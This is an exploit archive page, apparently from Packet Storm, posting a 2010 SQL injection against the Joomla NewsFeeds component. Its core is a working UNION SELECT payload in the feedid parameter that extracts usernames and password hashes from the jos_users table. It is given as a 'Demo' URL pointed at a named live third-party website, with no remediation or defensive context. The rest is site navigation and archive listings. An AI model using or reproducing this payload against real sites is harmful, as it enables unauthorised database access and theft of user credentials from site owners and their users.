Joomla NewsFeeds SQL Injection

Joomla NewsFeeds SQL Injection: Posted Apr 30, 2010; Authored by Archimonde; The Joomla NewsFeeds component suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 8ff40dc55942fdf270c221e63518fe569f94ab940b8f47cb62abe9da97a9bbb2; Download | Favorite | View

Joomla NewsFeeds SQL Injection



# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
# Date: 30/04/2010
# Author: Archimonde
# Software Link:
# Version:
# Tested on:
# CVE :
# Code :

Email : archimondera@gmail.com
Website : xgroupvn.org - programmer.vn

index.php?option=com_newsfeeds&view=categories&feedid=[sqli]

Demo :

http://www.diaocphuthanh.com.vn/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--

Top Authors In Last 30 Days

Red Hat 136 files
Ubuntu 91 files
indoushka 33 files
Debian 22 files
nu11secur1ty 15 files
Gentoo 13 files
Apple 13 files
Google Security Research 8 files
CraCkEr 6 files
mjurczyk 4 files

File Archives

Systems

AIX (428)
Apple (2,016)
BSD (374)
CentOS (57)
Cisco (1,925)
Debian (6,846)
Fedora (1,692)
FreeBSD (1,245)
Gentoo (4,335)
HPUX (879)
iOS (355)
iPhone (108)
IRIX (220)
Juniper (68)
Linux (46,841)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,925)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,949)
UNIX (9,317)
UnixWare (186)
Windows (6,590)
Other

Joomla NewsFeeds SQL Injection

Joomla NewsFeeds SQL Injection

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla NewsFeeds SQL Injection

Share This

Joomla NewsFeeds SQL Injection

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems